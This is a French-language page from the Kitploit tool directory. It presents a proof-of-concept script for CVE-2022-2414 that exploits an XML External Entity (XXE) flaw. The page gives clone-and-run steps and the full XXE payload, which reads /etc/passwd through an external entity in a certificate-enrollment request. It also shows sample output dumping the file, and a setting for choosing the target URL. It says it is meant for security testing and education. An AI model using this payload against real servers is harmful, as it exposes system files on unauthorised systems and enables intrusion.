Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-2414 — est un script PoC pour démontrer l'exploitation d'une vulnérabilité XML External Entity (XXE) | Kitploit
Outils/GitHubGitHub/geniuszly/cve-2022-2414
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubgeniuszly/cve-2022-2414

CVE-2022-2414

est un script PoC pour démontrer l'exploitation d'une vulnérabilité XML External Entity (XXE)

Voir le dépôt
32il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

FR

GenXMLExternalEntityExploit est un script PoC pour démontrer l'exploitation d'une vulnérabilité XML External Entity (XXE). Le script utilise des charges utiles XML pour lire des fichiers sensibles sur un serveur cible. Cela peut être utile pour les tests de sécurité, les tests d'intrusion ou à des fins éducatives.

Fonctionnalités

  • Envoie une charge utile XML conçue à un serveur spécifié.
  • Exploite les vulnérabilités XXE pour lire des fichiers sur le serveur.
  • URL cible et données de charge utile facilement personnalisables.

Comment utiliser

  1. Clonez le dépôt
    root@kitploit:~
    git clone https://github.com/geniuszly/CVE-2022-2414
    
  2. Rendez-vous dans le répertoire
    root@kitploit:~
    cd CVE-2022-2414
    
  3. Exécutez le script Assurez-vous que Python est installé sur votre machine.
    root@kitploit:~
    python3 GenXMLExternalEntityExploit.py
    

Configuration

  • TARGET_URL : Mettez à jour la variable TARGET_URL dans le script pour pointer vers le serveur cible que vous souhaitez tester.
  • XML_PAYLOAD : Personnalisez la chaîne XML_PAYLOAD dans le script pour des chemins de fichiers ou des opérations côté serveur spécifiques.
  • HEADERS : Modifiez les en-têtes HTTP si nécessaire.
  • Exemple

    Par défaut, le script utilise la charge utile suivante pour lire le fichier /etc/passwd :

    root@kitploit:~
    <!--?xml version="1.0" ?-->
    <!DOCTYPE xmlData [<!ENTITY fetchFile SYSTEM "file:///etc/passwd"> ]>
    <CertEnrollmentRequest>
      <Attributes/>
      <ProfileID>&fetchFile;</ProfileID>
    </CertEnrollmentRequest>
    

    Exemple de sortie

    root@kitploit:~
    Инициализация отправки XML-пейлоада на сервер...
    Статус-код ответа: 200
    Содержимое XML-ответа:
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nологin
    ...
    

    Avertissement

    Cet outil est destiné uniquement à des fins éducatives et aux tests de sécurité autorisés. L'auteur décline toute responsabilité en cas d'utilisation illégale de cet outil.

    Télécharger l’outil